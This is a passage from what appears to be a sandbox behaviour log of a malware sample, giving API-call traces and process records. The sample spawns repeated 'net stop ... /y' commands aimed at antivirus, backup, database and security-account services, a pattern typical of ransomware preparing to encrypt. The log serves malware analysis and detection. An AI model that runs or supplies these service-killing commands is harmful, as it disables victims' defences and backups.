nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.136] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.136] LocalFree (hMem=0x473e00) returned 0x0 [0105.136] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x16 [0105.136] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.136] LocalFree (hMem=0x473e00) returned 0x0 [0105.136] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㰘G⡋盺\x16㸀G\x16") returned 0x11 [0105.136] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.136] LocalFree (hMem=0x473c18) returned 0x0 [0105.136] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㰘G\x16") returned 0x14 [0105.136] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.136] LocalFree (hMem=0x473e00) returned 0x0 [0105.136] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x12 [0105.136] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.136] LocalFree (hMem=0x473e00) returned 0x0 [0105.136] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0xf [0105.136] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.136] LocalFree (hMem=0x473e00) returned 0x0 [0105.136] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x17 [0105.136] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.136] LocalFree (hMem=0x473e00) returned 0x0 [0105.137] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x18 [0105.137] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0105.137] LocalFree (hMem=0x473e00) returned 0x0 [0105.137] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x2a [0105.137] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0105.137] LocalFree (hMem=0x473e00) returned 0x0 [0105.137] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.137] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0105.137] GetFileType (hFile=0x0) returned 0x0 [0105.137] GetConsoleOutputCP () returned 0x1b5 [0105.152] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0105.152] malloc (_Size=0x16) returned 0x7026a8 [0105.152] GetConsoleOutputCP () returned 0x1b5 [0105.152] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x7026a8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0105.152] WriteFile (in: hFile=0x0, lpBuffer=0x7026a8, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x16f31c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f31c, lpOverlapped=0x0) returned 0 [0105.153] free (_Block=0x7026a8) [0105.153] LocalFree (hMem=0x473e00) returned 0x0 [0105.153] NetApiBufferFree (Buffer=0x471af8) returned 0x0 [0105.153] NetApiBufferFree (Buffer=0x471b10) returned 0x0 [0105.153] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BMR Boot Service /y" [0105.153] exit (_Code=1) Process: id = "107" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6fd15000" os_pid = "0x618" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0xc68" cmd_line = "C:\\Windows\\system32\\net1 stop ccEvtMgr /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 476 os_tid = 0xb0 [0104.416] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f9e4 | out: lpSystemTimeAsFileTime=0x16f9e4*(dwLowDateTime=0x138c20f0, dwHighDateTime=0x1d6f0d1)) [0104.416] GetCurrentProcessId () returned 0x618 [0104.416] GetCurrentThreadId () returned 0xb0 [0104.416] GetTickCount () returned 0x114e1d7 [0104.416] QueryPerformanceCounter (in: lpPerformanceCount=0x16f9dc | out: lpPerformanceCount=0x16f9dc*=22351677863) returned 1 [0104.416] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0104.416] __set_app_type (_Type=0x1) [0104.416] __p__fmode () returned 0x770331f4 [0104.416] __p__commode () returned 0x770331fc [0104.416] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0104.417] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0104.417] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.417] GetConsoleOutputCP () returned 0x1b5 [0104.417] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0104.417] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.420] sprintf_s (in: _DstBuf=0x16f99c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0104.420] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.090] GetStdHandle (nStdHandle=0xfffffff5) returned 0x40c [0105.090] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.090] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ccEvtMgr /y" [0105.090] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f768, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0105.090] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x64) returned 0x863ad8 [0105.090] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.090] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f96c | out: Buffer=0x16f96c*=0x861ae0) returned 0x0 [0105.090] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x16f96c | out: Buffer=0x16f96c*=0x861af8) returned 0x0 [0105.090] _fileno (_File=0x77032900) returned -2 [0105.090] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0105.091] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.091] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.091] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.091] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.091] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.091] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.091] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.091] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.091] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.091] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.091] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.091] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.091] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.091] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.091] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.091] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.091] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.091] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.091] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.091] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.091] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.091] _wcsicmp (_String1="accounts", _String2="ccEvtMgr") returned -2 [0105.091] _wcsicmp (_String1="computer", _String2="ccEvtMgr") returned 12 [0105.091] _wcsicmp (_String1="config", _String2="ccEvtMgr") returned 12 [0105.091] _wcsicmp (_String1="continue", _String2="ccEvtMgr") returned 12 [0105.091] _wcsicmp (_String1="cont", _String2="ccEvtMgr") returned 12 [0105.091] _wcsicmp (_String1="file", _String2="ccEvtMgr") returned 3 [0105.092] _wcsicmp (_String1="files", _String2="ccEvtMgr") returned 3 [0105.092] _wcsicmp (_String1="group", _String2="ccEvtMgr") returned 4 [0105.092] _wcsicmp (_String1="groups", _String2="ccEvtMgr") returned 4 [0105.092] _wcsicmp (_String1="help", _String2="ccEvtMgr") returned 5 [0105.092] _wcsicmp (_String1="helpmsg", _String2="ccEvtMgr") returned 5 [0105.092] _wcsicmp (_String1="localgroup", _String2="ccEvtMgr") returned 9 [0105.092] _wcsicmp (_String1="pause", _String2="ccEvtMgr") returned 13 [0105.092] _wcsicmp (_String1="session", _String2="ccEvtMgr") returned 16 [0105.092] _wcsicmp (_String1="sessions", _String2="ccEvtMgr") returned 16 [0105.092] _wcsicmp (_String1="sess", _String2="ccEvtMgr") returned 16 [0105.092] _wcsicmp (_String1="share", _String2="ccEvtMgr") returned 16 [0105.092] _wcsicmp (_String1="start", _String2="ccEvtMgr") returned 16 [0105.092] _wcsicmp (_String1="stats", _String2="ccEvtMgr") returned 16 [0105.092] _wcsicmp (_String1="statistics", _String2="ccEvtMgr") returned 16 [0105.092] _wcsicmp (_String1="stop", _String2="ccEvtMgr") returned 16 [0105.092] _wcsicmp (_String1="time", _String2="ccEvtMgr") returned 17 [0105.092] _wcsicmp (_String1="user", _String2="ccEvtMgr") returned 18 [0105.092] _wcsicmp (_String1="users", _String2="ccEvtMgr") returned 18 [0105.092] _wcsicmp (_String1="msg", _String2="ccEvtMgr") returned 10 [0105.092] _wcsicmp (_String1="messenger", _String2="ccEvtMgr") returned 10 [0105.092] _wcsicmp (_String1="receiver", _String2="ccEvtMgr") returned 15 [0105.092] _wcsicmp (_String1="rcv", _String2="ccEvtMgr") returned 15 [0105.092] _wcsicmp (_String1="netpopup", _String2="ccEvtMgr") returned 11 [0105.092] _wcsicmp (_String1="redirector", _String2="ccEvtMgr") returned 15 [0105.092] _wcsicmp (_String1="redir", _String2="ccEvtMgr") returned 15 [0105.092] _wcsicmp (_String1="rdr", _String2="ccEvtMgr") returned 15 [0105.093] _wcsicmp (_String1="workstation", _String2="ccEvtMgr") returned 20 [0105.093] _wcsicmp (_String1="work", _String2="ccEvtMgr") returned 20 [0105.093] _wcsicmp (_String1="wksta", _String2="ccEvtMgr") returned 20 [0105.093] _wcsicmp (_String1="prdr", _String2="ccEvtMgr") returned 13 [0105.093] _wcsicmp (_String1="devrdr", _String2="ccEvtMgr") returned 1 [0105.093] _wcsicmp (_String1="lanmanworkstation", _String2="ccEvtMgr") returned 9 [0105.093] _wcsicmp (_String1="server", _String2="ccEvtMgr") returned 16 [0105.093] _wcsicmp (_String1="svr", _String2="ccEvtMgr") returned 16 [0105.093] _wcsicmp (_String1="srv", _String2="ccEvtMgr") returned 16 [0105.093] _wcsicmp (_String1="lanmanserver", _String2="ccEvtMgr") returned 9 [0105.093] _wcsicmp (_String1="alerter", _String2="ccEvtMgr") returned -2 [0105.093] _wcsicmp (_String1="netlogon", _String2="ccEvtMgr") returned 11 [0105.093] _wcsupr (in: _String="ccEvtMgr" | out: _String="CCEVTMGR") returned="CCEVTMGR" [0105.093] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x8654a8 [0105.138] GetServiceKeyNameW (in: hSCManager=0x8654a8, lpDisplayName="CCEVTMGR", lpServiceName=0x3faaf0, lpcchBuffer=0x16f908 | out: lpServiceName="", lpcchBuffer=0x16f908) returned 0 [0105.138] _wcsicmp (_String1="msg", _String2="CCEVTMGR") returned 10 [0105.138] _wcsicmp (_String1="messenger", _String2="CCEVTMGR") returned 10 [0105.138] _wcsicmp (_String1="receiver", _String2="CCEVTMGR") returned 15 [0105.138] _wcsicmp (_String1="rcv", _String2="CCEVTMGR") returned 15 [0105.139] _wcsicmp (_String1="redirector", _String2="CCEVTMGR") returned 15 [0105.139] _wcsicmp (_String1="redir", _String2="CCEVTMGR") returned 15 [0105.139] _wcsicmp (_String1="rdr", _String2="CCEVTMGR") returned 15 [0105.139] _wcsicmp (_String1="workstation", _String2="CCEVTMGR") returned 20 [0105.139] _wcsicmp (_String1="work", _String2="CCEVTMGR") returned 20 [0105.139] _wcsicmp (_String1="wksta", _String2="CCEVTMGR") returned 20 [0105.139] _wcsicmp (_String1="prdr", _String2="CCEVTMGR") returned 13 [0105.139] _wcsicmp (_String1="devrdr", _String2="CCEVTMGR") returned 1 [0105.139] _wcsicmp (_String1="lanmanworkstation", _String2="CCEVTMGR") returned 9 [0105.139] _wcsicmp (_String1="server", _String2="CCEVTMGR") returned 16 [0105.139] _wcsicmp (_String1="svr", _String2="CCEVTMGR") returned 16 [0105.139] _wcsicmp (_String1="srv", _String2="CCEVTMGR") returned 16 [0105.139] _wcsicmp (_String1="lanmanserver", _String2="CCEVTMGR") returned 9 [0105.139] _wcsicmp (_String1="alerter", _String2="CCEVTMGR") returned -2 [0105.139] _wcsicmp (_String1="netlogon", _String2="CCEVTMGR") returned 11 [0105.139] NetServiceControl (in: servername=0x0, service="CCEVTMGR", opcode=0x0, arg=0x0, bufptr=0x16f904 | out: bufptr=0x16f904) returned 0x889 [0105.140] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.140] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0105.142] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0105.143] GetFileType (hFile=0x0) returned 0x0 [0105.143] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x863ec0 [0105.143] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x863ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0105.143] WriteFile (in: hFile=0x0, lpBuffer=0x863ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x16f844, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f844, lpOverlapped=0x0) returned 0 [0105.143] LocalFree (hMem=0x863ec0) returned 0x0 [0105.143] GetFileType (hFile=0x0) returned 0x0 [0105.143] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x866170 [0105.143] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x866170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x86", lpUsedDefaultChar=0x0) returned 2 [0105.143] WriteFile (in: hFile=0x0, lpBuffer=0x866170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f844, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f844, lpOverlapped=0x0) returned 0 [0105.143] LocalFree (hMem=0x866170) returned 0x0 [0105.143] _ultow (in: _Dest=0x889, _Radix=1505396 | out: _Dest=0x889) returned="2185" [0105.143] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0105.143] GetFileType (hFile=0x0) returned 0x0 [0105.143] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x866170 [0105.143] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x866170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0105.143] WriteFile (in: hFile=0x0, lpBuffer=0x866170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x16f850, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f850, lpOverlapped=0x0) returned 0 [0105.143] LocalFree (hMem=0x866170) returned 0x0 [0105.144] GetFileType (hFile=0x0) returned 0x0 [0105.144] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x866170 [0105.144] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x866170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x86", lpUsedDefaultChar=0x0) returned 2 [0105.144] WriteFile (in: hFile=0x0, lpBuffer=0x866170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f850, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f850, lpOverlapped=0x0) returned 0 [0105.144] LocalFree (hMem=0x866170) returned 0x0 [0105.144] NetApiBufferFree (Buffer=0x861ae0) returned 0x0 [0105.144] NetApiBufferFree (Buffer=0x861af8) returned 0x0 [0105.144] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ccEvtMgr /y" [0105.144] exit (_Code=2) Process: id = "108" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1becd000" os_pid = "0x62c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SamSs /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 477 os_tid = 0x63c Process: id = "109" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x1ec56000" os_pid = "0x5a0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\sppsvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:00062ad2" [0xc000000f], "LOCAL" [0x7] Thread: id = 478 os_tid = 0x740 Thread: id = 486 os_tid = 0x490 Thread: id = 501 os_tid = 0xeb8 Thread: id = 502 os_tid = 0xd74 Thread: id = 558 os_tid = 0x634 Thread: id = 664 os_tid = 0xe4c Thread: id = 1024 os_tid = 0xdc8 Process: id = "110" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x259d6000" os_pid = "0x628" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 480 os_tid = 0x73c Process: id = "111" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x259db000" os_pid = "0x6d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop AcrSch2Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 481 os_tid = 0x5e8 Process: id = "112" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x25be0000" os_pid = "0x7d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 482 os_tid = 0x4e0 Process: id = "113" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x251e5000" os_pid = "0x4bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLFDLauncher$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 483 os_tid = 0xcec Process: id = "114" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x25aea000" os_pid = "0xcf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop KAVFS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 484 os_tid = 0x720 Process: id = "115" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1beef000" os_pid = "0x718" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop SQLWriter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 485 os_tid = 0x310 Process: id = "116" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1c1e0000" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQLFDLauncher$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 487 os_tid = 0xb78 Process: id = "117" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x261e9000" os_pid = "0xae0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason 